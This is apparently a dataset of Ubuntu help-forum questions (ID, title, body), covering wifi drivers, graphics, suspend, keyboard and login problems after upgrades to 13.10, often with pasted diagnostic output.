363099	an outstanding challenge to get my wifi to work on my laptop ... i need a new fresh idea do you have it ?	so the laptop is acer aspire 5710z running 12.04 here is the lspci 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 02 ) 00:1c.2 pci bridge : intel corporation nm10/ich7 family pci express port 3 ( rev 02 ) 00:1c.3 pci bridge : intel corporation nm10/ich7 family pci express port 4 ( rev 02 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 02 ) 00:1f.2 sata controller : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ahci mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 02 ) 04:00.0 ethernet controller : broadcom corporation netlink bcm5787m gigabit ethernet pci express ( rev 02 ) 05:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) 06:00.0 flash memory : ene technology inc ene pci memory stick card reader controller 06:00.1 sd host controller : ene technology inc ene pci smartmedia / xd card reader controller 06:00.2 flash memory : ene technology inc memory stick card reader controller 06:00.3 flash memory : ene technology inc ene pci secure digital / mmc card reader controller then sudo lspci -nnk -s 05:00.0 05:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 ) subsystem : ambit microsystem corp. device [ 1468:0422 ] kernel driver in use : b43-pci-bridge kernel modules : ssb then annette @ annette-aspire-5710z : ~ $ sudo rfkill list all 0 : acer-wireless : wireless lan soft blocked : no hard blocked : no annette @ annette-aspire-5710z : ~ $ and why not annette @ annette-aspire-5710z : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:1b:38:23:58:93 inet addr:192.168.178.56 bcast:192.168.178.255 mask:255.255.255.0 inet6 addr : fe80 : :21b:38ff : fe23:5893/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:388530 errors:0 dropped:0 overruns:0 frame:0 tx packets:205406 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:564817042 ( 564.8 mb ) tx bytes:17587353 ( 17.5 mb ) interrupt:18 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:12307 errors:0 dropped:0 overruns:0 frame:0 tx packets:12307 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1012956 ( 1.0 mb ) tx bytes:1012956 ( 1.0 mb ) i hope this gives you a start . i am willing to do any and all methods that have worked for you before ... currently i am downloading 13.10 as a last attempt at a complete system restart or something .
363103	how to install fuelphp	i tried to install fuelphp , according the oficial documentation , but it did n't work . when i type the 'oil create ' command nothing happens ! thanks in advance !
363105	broken hdd with /var /tmp inside .	my 2tb hard disk is broken . /var , /tmp and swap partition were in this drive . i can start ubuntu but only in text mode and wih limits . how can i create /var and /tmp inside / partition ? now /etc/fstab is changed without the broken hard drive but ubuntu tell me that /var is missing .
363106	failing to add second nic for direct crossover connection to second server	we have two servers , now standing next to each other at our hoster . the have both a second nic and are connected directly . i have added the new nic via the following commands : server 1 $ sudo ifconfig eth1 down $ sudo ifconfig eth1 192.168.0.1 $ sudo ifconfig eth1 up server 2 $ sudo ifconfig eth1 down $ sudo ifconfig eth1 192.168.0.2 $ sudo ifconfig eth1 up now ifconfig on both servers looks good : server 1 eth0 link encap : ethernet [ … ] eth1 link encap : ethernet hwaddr 68:05 : ca:1b : ad:96 inet addr:192.168.0.1 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :6a05 : caff : fe1b : ad96/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:138 errors:0 dropped:0 overruns:0 frame:0 tx packets:85 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:18245 ( 18.2 kb ) tx bytes:6672 ( 6.6 kb ) interrupt:16 memory : f7cc0000-f7ce0000 lo link encap : local [ … ] server 2 eth0 link encap : ethernet [ … ] eth1 link encap : ethernet hwaddr 68:05 : ca:0d:56 : b2 inet addr:192.168.0.2 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :6a05 : caff : fe0d:56b2/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:71 errors:0 dropped:0 overruns:0 frame:0 tx packets:129 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5504 ( 5.5 kb ) tx bytes:10034 ( 10.0 kb ) interrupt:17 memory : f7dc0000-f7de0000 lo link encap : local [ … ] the servers can ping each other . however , all other connection attempts , e.g . ssh fail when using the new ip addresses . ( timeout ) what are we missing ? which configuration do we need to apply for the servers to communicate directly ?
363107	page titles disapeared from chrome tabs after upgrading to 13.10	after upgrading my ubuntu to 13.10 , chrome is not showing titles of websites in tabs ( only favicons ) . any idea whats wrong ?
363108	ubuntu fails at `` load fallback graphics devices ''	first i 'm brand new to ubuntu . i just installed it two days ago so i do n't know any thing at all about what i 'm doing . yesterday i was prompted i loaded and ran the other drivers checker . the dialog box said that i had 119 navidia drivers that needed to be loaded so i did that . when i went to start my machine today i get all these lines of showing on my startup screen . the line that fails said starting load fallback graphics devices . what is the first step in fixing this problem . i have a dual boot windows and ubuntu 12.04.3 desktop installation .
363111	ubuntu 13.10 suspend crashes kde / black screen on wake	setup i have a fresh install of ubuntu 13.10 , with kde ( installed via ubuntu server disk and sudo apt-get install kubuntu-desktop ) . problem whenever i suspend the computer while in kde ( either via sudo pm-suspend in konsole or via kde 's interface ) , i get a black screen on wake up . attempted workarounds / fixes if i press ctrl+alt+f1 and then ctrl+alt+f7 and i 'm patient ( 20-30 seconds ) , i sometimes get back into kde where i was , or sometimes i get back to the login screen ( kde crashed ) . but even when i get back into kde , i get a notification saying that the special effects had to restart due to a graphics problem and then the fonts in all applications are ... garbled . if i suspend from another tty with sudo pm-suspend ( while kde is running on tty7 ) , it works flawlessly ( resumes instantly - no need to wait 20-30 seconds , kde does not crash and does not cause font garble ) . i tried changing graphics drivers and i get the same thing ( i have nvidia nvs300 and i 'm using the latest proprietary drivers in ubuntu repos ) . also tried this ubuntu freezes/crash after wake when upgraded to 13.10 and it did n't work . this problem did not occur on the same system , when i was running kubuntu 12.04 . trying to find the problem ... dmesg does n't show any errors . i do n't even know where to look further for any errors ( any kde logs ? ) . any help appreciated .
363115	how to type latin small letter c with cedilla	i run ubuntu on a dell xps 13 notebook that has an us keyboard configured as us international . after upgrading to version 13.10 i can no loger get a cedilla by typing '+c . instead , i get a `` ฤ '' . what should i do to get a `` รง '' ? i am using ubuntu gnome 13.10 64 bit .
363116	`` domain '' in resolv.conf shows the wrong domain name	i have noticed that the `` domain '' field in /etc/resolv.conf contains the domain name of a network i do not use any more . is there a program/application available that can search for the right domain name and write it to the resolv.conf file ? the reason why i would like to have the correct domain name in the `` domain '' field is that i want to install a program that needs the host name of the computer . during the installation procedure i get the message `` could not successfully ping hostname.old-domain-name '' . obviously this does not work because i am not connected to that network any more . i would appreciate very much if someone could help me finding the solution .
363118	disabling nvidia splash screen at boot time	i have installed 13.10 amd64 on my hp dv9704tx laptop with nvidia 8600m gs graphics card . using jockey tool , i have installed and enabled the latest proprietary drivers . on reboot , i found that nvidia splash screen is getting displayed at boot time which i want to disable . on googling for this , i found a lot of articles suggesting the addition of nologo directive to xorg.conf . but there is no xorg.conf in /etc/x11 directory . i even tried creating one using nvidia-xconfig command . but on reboot , x refused to work properly and started in low-graphics mode . removing xorg.conf and rebooting fixed the problem , but the splash screen is shown . how to remove the splash screen and have a working x ?
363119	kubuntu 13.10 black desktop	i upgraded my kubuntu 13.04 i386 installation on my acer one aspire to kubuntu 13.10 beta 2 . after the upgrade and reboot , the login screen appeared as normal . after logging in , the various `` loading '' icons appeared , and then the screen went black , except for the mouse cursor . occasionally , a notification dialog ( for system updates ) would appear . i could switch to tty 1 and login there and update , so the netbook was still working . basically , the desktop was black . there was a known problem with beta 2 relating to this , but did not apply to me , as i had not applied any colour correction . the work-around for this ( disabling and re-enabling compositing ) did not fix the problem . i 've now fully updated the netbook to 13.10 ( via tty ) , but the problem persists . how can i fix this ? i 'd like to avoid installing 13.10 if possible . update : i booted kubuntu 13.10 i386 from a live usb and selected `` try kubuntu '' . the desktop appeared . i then reinstalled , overwriting / , but keeping /home/ . after rebooting and logging in , the desktop appears black , with only the mouse cursor showing , as before . pressing alt-shift f12 toggles the wallpaper showing , but that 's all .
363121	map ctrl key to alt key & alt key to win key from command line ?	i have a logitech mac-layout keyboard that i use when my laptop is docked . right now every time i dock or undock my laptop i have to go to the keyboard layout options panel and change the behavior of the ctrl , alt , & win/cmd keys . is there anyway i can do this from the terminal , or have it so when it detects the logitech keyboard it automatically switches ? i 'm not using an apple keyboard , so it does n't appear the applekeyboard instructions work . i 'm running ubuntu 12.04lts .
363122	ca n't connect android 4.1.2 device to ubuntu 13.10	i 'm having problems to connect my android 4.1.2 device to my recently installed ubuntu 13.10 . the system just do n't recognizes the device to mount , but when i run dmesg it 's pretty clear than the system catch all info about the attached device , see : [ 336.008777 ] usb 1-1.2 : usb disconnect , device number 5 [ 363.119059 ] usb 1-1.2 : new high-speed usb device number 6 using ehci-pci [ 363.212290 ] usb 1-1.2 : new usb device found , idvendor=22b8 , idproduct=64b5 [ 363.212294 ] usb 1-1.2 : new usb device strings : mfr=2 , product=3 , serialnumber=4 [ 363.212297 ] usb 1-1.2 : product : x91x [ 363.212299 ] usb 1-1.2 : manufacturer : motorola [ 363.212301 ] usb 1-1.2 : serialnumber : ( device_serial_number ) [ 363.213303 ] cdc_acm 1-1.2:1.1 : this device can not do calls on its own . it is not a modem . [ 363.213339 ] cdc_acm 1-1.2:1.1 : ttyacm0 : usb acm device i also tried to install programs like gmtp but without any success ... so , what 's going on ? how can i make that stuff to work ? thanks ! p.s . : sorry my ( terrible ) english , i 'm from brazil .
363125	ubuntu 13.10 and raedon hd 7700 , which drivers ?	should i use the fglrx or the open source drivers for this card , to get the best use out of it ? ie , gaming and good visual effects in gnome 3 .
363126	slow wifi after with centrino wireless-n 1030 [ rainbow peak ]	after upgrading from kubuntu 13.04 to 13.10 suddenly my wifi connection is very slow . ping times are varying from 200 up to 1500 ms to www.google.nl . when i connect my ethernet cable they drop to normal times like 8 or 9 ms . anyone experiencing the same problem or know a solution i can try ? during the upgrade process a few times they asked whether i wanted to keep or replace some kind of configuration file . i 'm not sure anymore which file it was , but maybe this has something to do with it . before the upgrade both wired and wireless connection worked perfect . ***** uname -a ***** linux k53sv 3.11.0-12-generic # 19-ubuntu smp wed oct 9 16:20:46 utc 2013 x86_64 x86_64 x86_64 gnu/linux ***** lsb_release ***** distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy ***** lspci ***** 03:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 1030 [ rainbow peak ] [ 8086:008a ] ( rev 34 ) subsystem : intel corporation centrino wireless-n 1030 bgn [ 8086:5305 ] kernel driver in use : iwlwifi 04:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) subsystem : asustek computer inc. device [ 1043:1277 ] kernel driver in use : r8169 ***** lsusb ***** bus 002 device 008 : id 046d : c31c logitech , inc . keyboard k120 for business bus 002 device 007 : id 1532:000d razer usa , ltd bus 002 device 006 : id 045e:0761 microsoft corp . bus 002 device 005 : id 05e3:0608 genesys logic , inc. usb-2.0 4-port hub bus 002 device 004 : id 03f0:7611 hewlett-packard deskjet f2492 all-in-one bus 002 device 003 : id 05e3:0608 genesys logic , inc. usb-2.0 4-port hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 0bda:0139 realtek semiconductor corp. rts5139 card reader controller bus 001 device 004 : id 058f : a014 alcor micro corp. asus integrated webcam bus 001 device 008 : id 8086:0189 intel corp . bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub ***** iwconfig ***** wlan0 ieee 802.11bgn essid : '' linksys '' mode : managed frequency:2.437 ghz access point : < mac address removed > bit rate=1 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=70/70 signal level=-32 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:3 invalid misc:24617 missed beacon:0 ***** lsmod ***** iwldvm 237440 0 mac80211 596969 1 iwldvm iwlwifi 165398 1 iwldvm cfg80211 479757 3 iwlwifi , mac80211 , iwldvm ***** nm-tool ***** networkmanager tool state : connected ( global ) - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : < mac address removed > capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : off - device : wlan0 [ linksys ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : iwlwifi state : connected default : yes hw address : < mac address removed > capabilities : speed : 1 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) *linksys : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 88 wpa2 yo-chris-yo : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 39 wpa2 sitecom0210c8 : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 49 wpa2 sitecom72de64 : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 60 wpa2 fonera : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 49 wpa2 fon_free_internet : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 50 uilenstede/acta/rijssen : infra , < mac address removed > , freq 2472 mhz , rate 54 mb/s , strength 44 wpa2 sparkalme : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 24 wpa wpa2 eikrijke : infra , < mac address removed > , freq 2457 mhz , rate 54 mb/s , strength 27 wpa wpa2 chan : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 32 wpa wpa2 dedriekoffertjes : infra , < mac address removed > , freq 2452 mhz , rate 54 mb/s , strength 34 wpa2 tp-link_efa49a : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 24 wpa2 sitecom6c4844 : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 29 wpa2 skj : infra , < mac address removed > , freq 2452 mhz , rate 54 mb/s , strength 32 wpa2 guess who ... : infra , < mac address removed > , freq 2452 mhz , rate 54 mb/s , strength 19 wpa wpa2 ipv4 settings : address : 192.168.1.111 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 192.168.1.1 ***** networkmanager.state ***** [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true ***** networkmanager.conf ***** [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false ***** interfaces ***** # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback ***** iwlist ***** wlan0 scan completed : cell 01 - address : < mac address removed > channel:6 frequency:2.437 ghz ( channel 6 ) quality=70/70 signal level=-31 dbm encryption key : on essid : '' linksys '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=0000001c97005a91 extra : last beacon : 16ms ago ie : unknown : 00074c696e6b737973 ie : unknown : 010882848b962430486c ie : unknown : 030106 ie : unknown : 2a0100 ie : unknown : 2f0100 ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : 32040c121860 ie : unknown : 2d1afc181bffff000000000000000000000000000000000000000000 ie : unknown : 3d1606081500000000000000000000000000000000000000 ie : unknown : dd090010180202f0040000 ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 cell 02 - address : < mac address removed > channel:1 frequency:2.412 ghz ( channel 1 ) quality=21/70 signal level=-89 dbm encryption key : on essid : '' sparkalme '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=000000029f2c6dc5 extra : last beacon : 5544ms ago ie : unknown : 0009537061724b616c6d65 ie : unknown : 010882848b962430486c ie : unknown : 030101 ie : unknown : 2a0100 ie : unknown : 2f0100 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : 32040c121860 ie : unknown : 2d1a7c181bffff000000000000000000000000000000000000000000 ie : unknown : 3d1601001300000000000000000000000000000000000000 ie : unknown : dd740050f204104a0001101044000102103b0001031047001085f64238a1415de70dcb4f68e34271b0102100074c696e6b73797310230004453930301024000776312e302e30331042000234321054000800060050f20400011011000445393030100800022688103c0001011049000600372a000120 ie : unknown : dd090010180201f0280000 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk cell 03 - address : < mac address removed > channel:1 frequency:2.412 ghz ( channel 1 ) quality=30/70 signal level=-80 dbm encryption key : on essid : '' fonera '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 9 mb/s 18 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 12 mb/s ; 24 mb/s ; 48 mb/s mode : master extra : tsf=0000000207b024ba extra : last beacon : 16ms ago ie : unknown : 0006466f6e657261 ie : unknown : 010882848b961224486c ie : unknown : 030101 ie : unknown : 2a0104 ie : unknown : 32040c183060 ie : unknown : 2d1a6c0117ff000000000000000000000000000000000c0000000000 ie : unknown : 3d1601000400000000000000000000000000000000000000 ie : unknown : 3e0100 ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 ie : unknown : 0b05010031127a ie : unknown : 7f0101 ie : unknown : dd07000c4304000000 ie : unknown : 07064e4c20010d10 ie : unknown : dd9d0050f204104a0001101044000102103b000103104700102880288028801880a8800018842cfc8c1021001852616c696e6b20546563686e6f6c6f67792c20436f72702e1023001c52616c696e6b20576972656c6573732041636365737320506f696e74102400065254323836301042000831323334353637381054000800060050f20400011011000952616c696e6b415053100800020084103c000101 cell 04 - address : < mac address removed > channel:1 frequency:2.412 ghz ( channel 1 ) quality=38/70 signal level=-72 dbm encryption key : off essid : '' fon_free_internet '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 9 mb/s 18 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 12 mb/s ; 24 mb/s ; 48 mb/s mode : master extra : tsf=0000000207b04858 extra : last beacon : 16ms ago ie : unknown : 0011464f4e5f465245455f494e5445524e4554 ie : unknown : 010882848b961224486c ie : unknown : 030101 ie : unknown : 2a0104 ie : unknown : 32040c183060 ie : unknown : 2d1a6c0117ff000000000000000000000000000000000c0000000000 ie : unknown : 3d1601000400000000000000000000000000000000000000 ie : unknown : 3e0100 ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 ie : unknown : 0b05010031127a ie : unknown : 7f0101 ie : unknown : dd07000c4304000000 ie : unknown : 07064e4c20010d10 cell 05 - address : < mac address removed > channel:1 frequency:2.412 ghz ( channel 1 ) quality=21/70 signal level=-89 dbm encryption key : on essid : '' chan '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=000000015f4ffaeb extra : last beacon : 7144ms ago ie : unknown : 00044368616e ie : unknown : 010882848b962430486c ie : unknown : 030101 ie : unknown : 050400010000 ie : unknown : 2a0100 ie : unknown : 2f0100 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : 32040c121860 ie : unknown : 2d1a7c181bffff000000000000000000000000000000000000000000 ie : unknown : 3d1601001700000000000000000000000000000000000000 ie : unknown : dd180050f204104a00011010440001021049000600372a000120 ie : unknown : dd090010180203f0280000 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ***** modinfo ***** filename : /lib/modules/3.11.0-12-generic/kernel/drivers/net/wireless/iwlwifi/dvm/iwldvm.ko license : gpl author : copyright ( c ) 2003-2013 intel corporation < ilw @ linux.intel.com > version : in-tree : description : intel ( r ) wireless wifi link agn driver for linux srcversion : 189d6366522149bff40da25 depends : iwlwifi , mac80211 , cfg80211 intree : y vermagic : 3.11.0-12-generic smp mod_unload modversions filename : /lib/modules/3.11.0-12-generic/kernel/drivers/net/wireless/iwlwifi/iwlwifi.ko license : gpl author : copyright ( c ) 2003-2013 intel corporation < ilw @ linux.intel.com > version : in-tree : description : intel ( r ) wireless wifi driver for linux firmware : iwlwifi-100-5.ucode firmware : iwlwifi-1000-5.ucode firmware : iwlwifi-135-6.ucode firmware : iwlwifi-105-6.ucode firmware : iwlwifi-2030-6.ucode firmware : iwlwifi-2000-6.ucode firmware : iwlwifi-5150-2.ucode firmware : iwlwifi-5000-5.ucode firmware : iwlwifi-6000g2b-6.ucode firmware : iwlwifi-6000g2a-5.ucode firmware : iwlwifi-6050-5.ucode firmware : iwlwifi-6000-4.ucode firmware : iwlwifi-3160-7.ucode firmware : iwlwifi-7260-7.ucode srcversion : b3ef32124305f5d1f6e94a5 full information : http : //pastebin.com/spui8hsz
363128	login problem for 13.10 , my username does not appear	after upgrading my ubuntu to the newest version 13.10 , in the login interface , my account does not appear . i can login the guest session . there is also a remote login . i have no place to input my username to login my account . does anyone have the same problem ? -- -- edit -- -- here is the file lightdm.conf [ seatdefaults ] greeter-session=unity-greeter user-session=ubuntu -- -- edit two -- - here is the official bug report : https : //bugs.launchpad.net/ubuntu/+source/unity-greeter/+bug/1235785
363134	picture of a spaceship occasionally appears on my monitor when switching monitors	seriously . no joke . clean 13.10 install . not a single picture on my computer . i press f4 to switch over to my external monitor and ... what is this ?
363142	increase font size in vim editor	actually i practice c programs in vim editor.but font size in it is very small.is there any option to increase the font size in vim editor ?
363143	how to create an axel script with 8-download-sources option ( for optional use with firefox-flashgot ) ?	i use firefox as default and a part of its might - including flashgot . - with that i like axel . - methinks that by default axel uses 4 connections per download and i also think it is not recommended to use more than that , but in rare ( emergency -- ) cases i want to have the option in flashgot of more than 4 . can i have a script in an executable file that i might add to flashgot as custom downloader ?
363145	oscilloscope for ubuntu 13.04	i need to import an mp3 or an ogg file and analyse it through an oscilloscope . is there any free ( as in beer ) software to do so ? i am aware of xoscope , but in the internet i have only found tutorials that show how to let it work whenever sounds are imported through the micro . i would like to simply `` open '' a file and start the analysis . is there anything that does so in a simple and reliable way ?
363146	how do i disable a nvidia 9600gt on macbookpro 5.1 ?	i finally put up a dual boot with ubuntu and lion on my old macbookpro 5.1 as reported in many cases the discrete graphics card is turned on all the time consuming a lot of power and thus heating up the laptop . since the discrete graphics card does not support the nvidia optimus technology , the corresponding packge nvidia-prime does not help in this case . therefore my question is , how to manually disable the discrete graphics card nvdidia 9600gt ? preferably a 'switch-on-the-run ' version , but a 'set-on-boot ' would be totally fine !
363147	mouse pointer hides sometimes since upgrade	i think it 's a bug . but i ca n't seem to find any information about it . the mouse pointer hides itself , but it is still possible to use it . whenever i start watching a video in vlc , or start playing ksp through steam my mouse pointer disappears . but it 's not returned upon exiting the application . i have not tried with other games in steam . the mouse pointer does not disappear when watching videos online through youtube at first , but it properly hides itself after a few seconds . the bug came about after i updated to 13.10 , it was not present with the same setup in 13.04 . i 've tried removing ~/.compiz and restarting the kernel module psmouse . going to tty1 and back to the desktop reveals the pointer , though this fix is bothering me . how do i fix this problem ?
363152	brightness issue in a lenovo thinkpad edge lr236w5	after upgrade from 13.04 to 13.10 brightness is not working . please let me know how to fix this issue , machine configurations given below . id : thinkpad description : notebook product : 0301g8g ( ) vendor : lenovo version : thinkpad edge serial : lr236w5 architecture : 64 bits
363153	porting ubuntu touch to galaxy s4 international lte , where to create the ucm directory and how to call it ?	i 'm currently trying to port ubuntu touch to the galaxy s4 international lte ( gi9505/ jfltexx ) . i 've come to the point where i need to create a ucm directory but i do n't know where and how i should call it . by `` looking at /usr/share/alsa/ucm/apq8064-tabla-snd-card/ '' is the local ubuntu pc directory or a directory on the downloaded cm meant ? same thing for /proc/asound/cards which should give a hint about what the directory should be called . 0 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xfb200000 irq 51 1 [ nvidia ] : hda-intel - hda nvidia hda nvidia at 0xfb080000 irq 17 i dont think the directory should be called anything like this .
363159	wifi stops working in 13.10	ok , my wifi is connecting fine , but it just stop downloading and uploading data . the skype stops , trying to reconnect , the firefox nighly and the google chromium stops loading pages and websites , everythings stops . but when i see the network icon : connected to my wifi . then , i simply reconnect , or disconnect and connect again . reconnecting , the wifi starts working again , the skype icon turns green , the browsers work again . previously , i had 13.04 and never had this problem . when i upgraded to ubuntu 13.10 , the wifi started to do this . and the wifi has this problem since the early times of 13.10 ; since i installed 13.10 , the wifi is having this issue ( from the first day i installed it ) . anyone having the same problem ? anyone knows how to fix it ?
363161	xfce power manager on xubuntu 13.10 does n't work	the problem is that its actually works , but something works with xfce power manager at the same time . for example , i set that if i pressed suspend button ( on my lenovo b560 its fn+f2 hotkey ) then system ask me what to do . but when log out window appears , system goes to suspend . another example is closing the lid . i set it to lock the screen via xfce power manager , but system still goes to suspend . i thought that it might be laptop-mode-tools , but it 's not installed . before 13.10 i had 13.04 and everything were fine .
363163	launch rhythmbox using a keyboard shorcut	i use rhythmbox all the time in my ubuntu . is it possible to have a custom shortcut like ctrl+r in ubuntu , which can launch the rhythmbox window , even if it is playing in the background ? since , the emphasis of linux os flavors is to use keyboards as much as possible instead of mouse , i thought this functionality might tremendously help me in my ubuntu environment . the keyboard shortcuts sections asks for a command ; so , i 'm not able to figure out how to give a custom keyboard shortcut to a program like rhythmbox . i 'm using 12.04 if that helps . thanks .
363164	panel power status problem	instead of showing my laptop battery status it showing me my mouse battery , how can i change it ? i have ubuntu 13.10 . *-battery description : lithium ion battery product : dell p8tc7275 vendor : simplo physical id : 1 lot : sys . battery bay capacity : 48000mwh configuration : voltage=11.1v
363166	how can we change the colours of the user-names on the log-on-screen ?	i 'm using ubuntu13.04 . i changed my background-image . this image has some rather white blobs . when i reboot the computer ( or log out ) the names of other users are barely visible ( because they have nearly the same colour as my background in that area ) . how can i change the colour of the user-names on the log-on-screen , such that they have more contrast with my background-image ?
363169	about ubuntu cloud server	how to install and deploy applications on ubuntu cloud server ? what 's the difference between ubuntu server and ubuntu cloud live image ?
363174	heavy applications lag xubuntu	ever since i started using xubuntu i have noticed that whenever i run any heavy application like eclipse , tomcat server or even when i open sites like facebook in multiple tabs in the web browser my system begins to lag . even the mouse movement and keyboard input are affected by it hence i am unable to open virtual console to close the application . the only way to get rid of it is to wait for 15 to 20 min or to reboot the system using reisub . i tried using applications like preload but even that did n't help . i have not allocated any swap space but the memory usage of the system rarely crosses 2 gb . even when the heavy applications were running , still more than 1 gb of the ram was free . my laptop has 4 gb ram and 2.13 ghz processor . xubuntu version is 13.04 and i update my system regularly . earlier i have used other distributions like opensuse but they all ran smoothly on my laptop . even windows runs without any issue . is the swap space the problem or are there any logs i should check ? the dmesg and the kern.log do n't show any abnormal behavior . is there a way to change scheduling method which it uses or to lower priorities of applications so that they do n't affect other applications ?
363183	restoring android when nothing launches	i 've installed ubuntu on my galaxy nexus successfully , but when i wanted to restore my android i 've made a mistake by wiping data , cache partition and dalvik cache . that 's why my android can not be restored , and ubuntu does n't launch . what should i do ?
363185	ubuntu 13.10 - skype not working correctly	i have updated my ubuntu 13.04 to 13.10 which i have believe cause skype not to working properly . for example on 13.04 it was working ok , it is still working on windows 8 ( so there is nothing wrong with my internet connection ) , but i get the following message each time i have try to send a message : on hover of the sign i get `` message is not sent '' . this should be the case if i have not got internet connection or if the person to whom i am sending the message has not got . but this is not the case ...
